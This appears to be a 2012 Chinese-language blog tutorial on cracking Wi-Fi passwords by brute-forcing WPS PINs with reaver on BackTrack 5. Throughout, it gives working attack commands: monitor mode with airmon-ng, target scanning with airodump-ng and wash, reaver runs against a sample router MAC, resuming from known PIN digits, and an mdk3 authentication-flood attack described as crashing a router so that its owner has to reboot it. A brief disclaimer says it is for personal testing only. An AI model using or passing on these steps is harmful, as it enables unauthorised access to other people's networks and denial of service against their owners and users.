精解reaver用BT5成功PIN解碼

精解reaver用BT5成功PIN解碼

 (2012-09-20 14:06:23)
標籤: 

reaver

 

bt5

 

pin

 

wireless

 

linux

分類: Linux
PIN碼破密特點:
1、不需要客戶端
2、有PIN碼就能獲得無線密碼
3、八位數PIN碼實際只有一萬一千組隨機密碼
4、抓包、EWSA跑包,每個環節都有很大的不確定性,而PIN破密,只要開戶WPS,破密只是個時間問題。

提醒:只限於個人測試使用,由於非法操作引起的相關法律責任與本作者無關。


reaver使用方法、步驟
1、打開超級終端 ROOt shell  
2、如果電腦裝有多個無線網卡,請先發指令
3、ifconfig -a
4、確認你用哪一個網卡WLAN0或WLAN1

下面的指令都是以單一網卡WLAN0爲例

一、激活監聽模式:
airmon-ng start wlan0

二、查看周邊AP信息(抓包):
airodump-ng  mon0
wash -i mon0 -C

觀察要破AP的PWR信號強弱變化,注意同頻干擾,調整網卡放置位置和角度、方向。

PWR 小於 -75 基本上會Timeout, PWR-60左右,則非常順暢(2-6秒攻擊一次)

三、按Ctrl+C終止抓包

四、 抓PIN碼:
reaver -i mon0 -b MAC  -vv
例如:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1

1.4版可用:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v   (可用一個v)

注意,MAC中冒號不可省略,MAC地址的字母大小寫均可, -vv是兩個V不是W

 

 


特別提示:

只有AP開啓了WPS、QSS功能,纔可以用PIN法破PSK密碼!

如何查看AP是否開了WPS、QSS呢?

一、使用指令:

airodump-ng  mon0

MB一欄下,出現  54e. 看清楚有點“.”) 是開WPS的


AP關閉了WPS、或者沒有QSS滴,會出現
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX  (ESSID: XXXX)


PIN破密對信號要求極爲嚴格,如果信號稍差,可能導致破密進度變慢或者路由死鎖等(重複同一個PIN碼 或 timeout),特別是1、6默認頻道中,有較多的AP,相互干擾,因此,確定網卡放置的最佳位置、方向、角度十分重要。


破解過程中 ,重複同一個PIN碼 或 timeout 可隨時隨地按Ctrl+C終止reaver會自動保存進度。
重複第2-4項內容,先看看AP信號強弱或是否關機,
若繼續破,則再次在終端中發送:
reaver -i mon0 -b MAC -vv

當reaver確定前4位PIN密碼後,其工作完成任務進度數值將直接跳躍至90.9%以上,也就是說只剩餘一千個密碼組合了。總共一萬一千個密碼。

曙光就在前頭,勝利往往在 再堅持一下的努力之中

如果,90.9%進程後死機或停機,請記下PIN前四位數,用指令:

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位數)

會從指定PIN段起破密。


額外:(假如pin死了,就用命令強制讓路由器重啓)
首先檢測網卡:
ifconfig -a

然後模擬端口:
airmon-ng start wlan0

接下來用:
airodump-ng mon0   //掃描ap找到你pin死的路由器mac

用mdk3 做身份驗證攻擊
mdk3 mon0 a -a mac(被pin死的路由器的mac)

身份驗證攻擊效果說明:
此攻擊是針對無線AP的洪水攻擊,又叫做身份驗證攻擊。其原理就是向AP發動大量的虛假的鏈接請求,這種請求數量一旦超 過了無線AP所能承受的範圍,AP就會自動斷開現有鏈接,使合法用戶無法使用無線網絡。迫使路由主人重啓路由器。

說明:
此命令功能強大,使用錯誤會造成所有ap不能使用,請指定mac地址,然後使用,其餘命令不要亂試。你要使用此命令的其他參數,請詳細閱讀此命令參數詳解。

此操作會讓路由器完全宕機,不但無線不能用,有線的也連接不了,必須重啓路由器!
請謹慎使用!

如果出現99.99%的一直pin的,但就是不出密碼,這可能是漏碼了,要重新pin,所以一開始pin的時候就再加一個參數。
reaver -i mon0 -b MAC -a -Svvn -d 0
加一個  -n  的參數這樣就不會漏碼了
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章